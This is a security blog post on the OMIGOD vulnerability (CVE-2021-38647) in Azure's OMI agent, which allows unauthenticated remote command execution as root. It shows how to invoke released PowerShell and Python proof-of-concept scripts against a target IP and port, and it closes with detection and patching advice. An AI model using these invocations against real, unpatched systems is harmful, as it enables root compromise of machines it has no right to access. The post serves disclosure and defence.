#OMIGOD - CVE-2021-38647

Hello All,

In this blog post, we will explore the Unauthenticated Remote Code Execution vulnerability discovered by the WIZ team in Azure Open Management Infrastructure (OMI) application that was assigned a CVE ID - CVE-2021-38647. The blog post published by the WIZ team contains all the details that are required to exploit the vulnerability if a vulnerable instance is available.

While reading the blog post, we thought of reproducing the scenario and create some quick PoC to exploit the vulnerability. We are releasing Proof of Concept (PoC) code in PowerShell & Python. The PoC code is published on the Github repo.

About Azure Open Management Infrastructure (OMI)

OMI is a UNIX/Linux application installed on the Azure UNIX/Linux VM that allows users to manage the machine & configuration remotely & locally. It is equivalent to Windows WMI that uses the Common Information Model (CIM). It runs with root privileges. The OMI application gets installed automatically when services like Azure Automation Accounts, Update Management, Log Analytics, Configuration Management, etc., are used for UNIX/Linux VM's. The OMI application also exposes the service over port 5986 if the Configuration Management service is used for managing the machine remotely.

We can extend the OMI functionality by leveraging the providers listed here. To execute OS commands we will leverage the SCXcore provider.

About OMIGOD Vulnerability

Anyone with network access to vulnerable endpoint can send a request that leverages the SCXcore provider without the Authorization header and execute OS commands on the target machine with root privileges! 

This vulnerability is now fixed but always worth to check against Linux VMs in Azure.

Setup

Microsoft has started rolling out the patches for newly created instances and also for the existing instances. If we want to create a lab environment in azure with vulnerable instance to test the exploit PoC or the Detection we can leverage the ARM Template created by Roberto Rodriguez. If we want to create a lab on-premises we can follow the blog published by rootsecdev.

Proof of Concept (PoC)

Both the PoC contains 2 methods to execute code on the target machine.
1) ExecuteShellCommand
2) ExecuteScript

Let's look at the PowerShell PoC -
. .\Invoke-CVE-2021-38647.ps1
Invoke-CVE-2021-38647 -TargetIP <IP> -TargetPort <PORT> -Command "<COMMAND>"

Command Execution

$MyScript = @"
id
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript))
$enc
Invoke-CVE-2021-38647 -TargetIP <IP> -TargetPort <PORT> -Script $enc

Command Execution

Now let's look at the Python PoC -

python .\CVE-2021-38647.py -t <IP> -p <PORT> -c "<COMMAND>"

Command Execution

$MyScript = @"
id
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript))
$enc
python .\CVE-2021-38647.py -t <IP> -p <PORT> -s "<SCRIPT>"

Command Execution

Detection & Mitigations

We can follow the blog published by Microsoft Team to detect the exploit.

https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093

To mitigate the vulnerability we need to update OMI agent to version 1.6.8.1 or above.

Reference


Comments

Popular posts from this blog

Information Disclosure - Internal Path Disclosure (PHPWCMS) - CVE-2018-12990

Introduction to Callidus

Process Injection - Part I